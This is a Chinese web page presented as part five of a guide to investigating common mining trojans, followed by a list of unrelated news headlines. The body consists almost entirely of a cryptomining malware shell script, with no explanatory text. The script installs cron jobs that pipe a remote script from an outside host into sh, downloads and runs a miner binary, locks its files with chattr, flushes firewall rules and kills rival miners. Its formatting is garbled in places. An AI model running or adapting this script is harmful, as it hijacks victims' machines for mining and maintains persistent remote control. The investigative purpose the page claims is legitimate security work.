如何排查常见挖矿木马( 五 ) _木马

    sh /etc/shz.sh fi
else
echo "goto 1" > /tmp/gmbpr2
chattr -i $cont
if [ -f "$bbdir" ]   then
    [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
   else
    [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
fi
ps -fe|grep zigw |grep -v grep if [ $? -ne 0 ]   then
    cd /tmp
    filesize=`ls -l zigw | awk '{ print $5 }'`
    file="/tmp/zigw"
    if [ -f "$file" ]     then
      if [ "$filesize" -ne "1467080" ]       then
        chattr -i /tmp/zigw
        rm -f zigw        if [ -f "$bbdir" ]        then
         curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw        elif [ -f "$bbdira" ]        then
         url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw        elif [ -f "$ccdir" ]        then
         wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw        elif [ -f "$ccdira" ]        then
         get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw        fi
      fi
     else
      if [ -f "$bbdir" ]      then
       curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw      elif [ -f "$bbdira" ]      then
       url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw      elif [ -f "$ccdir" ]      then
       wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw      elif [ -f "$ccdira" ]      then
       get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw      fi
    fi
    chmod 777 zigw
    sleep 1s
    ./zigw   else
    echo "runing....."
fi
chmod 777 /tmp/zigw
chattr +i /tmp/zigw
chmod 777 /tmp/shz.sh
chattr +i /tmp/shz.sh
shdir='/tmp/shz.sh'
if [ -f "$shdir" ]   then
    echo "exists shell"
   else
    if [ -f "$bbdir" ]    then
     curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh    elif [ -f "$bbdira" ]    then
     url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh    elif [ -f "$ccdir" ]    then
     wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh    elif [ -f "$ccdira" ]    then
     get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh    fi
    sh /tmp/shz.sh fifiiptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 14444 -j DROP
iptables-save
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9

如何排查常见挖矿木马( 五 )

推荐阅读

IT之家|OneDrive 阻止部分用户升级 Win10 版本 2004，微软

手机被“监听”的3大征兆，如果出现了，或许会导致个人隐私泄露

中国新闻网|聚焦特殊高考季：高考加油站续力心理辅导也不容忽视

数据|9月以来丁苯橡胶价格上涨近8%

公交|大二男生6天坐公交从上海飙到北京走红成高中作文题

中新网|9个月大宝宝吞下金吊坠 “吞金自杀”真会要命吗？

贵过|原创科比比赛地板签名硬木卖出天价，贵过一套房，凡妮莎获赠粉丝收藏

新冠病毒|一名印尼男子扬言炸毁麦当劳，因为他认为意大利人制造了新冠病毒

高血压怎么办让你远离高血压的8款药膳

小鹅通，直播软件中的王者

喝哪种绿茶好,孕期喝菊花茶的注意事项

伤害究竟是啥受到伤害咋办以及怎样提高抗干扰能力

大意失荆州关羽是被谁所杀?关羽在荆州时的谋士

小三|“毛概”美女老师张石头被曝当小三，导致对方离婚打掉二胎？

深圳市|深圳最厉害“隐形富豪”：年赚超一万亿，腾讯阿里总和都比不上！

『四眼谈娱乐』王菲最喜欢的水果，答案居然是“榴莲”？，萧敬腾搞怪问谢霆锋

郑州茶协帮助千余家供销超市卖茶

趣味史鉴|贝利亚表示从了我吧，奥特曼：红蓝自古出CP？赛罗郁闷自己的对象

新华网|昔日脏乱差今朝美如画——河北一个“后进村”的嬗变

幼儿园教师述职报告幼儿园述职报告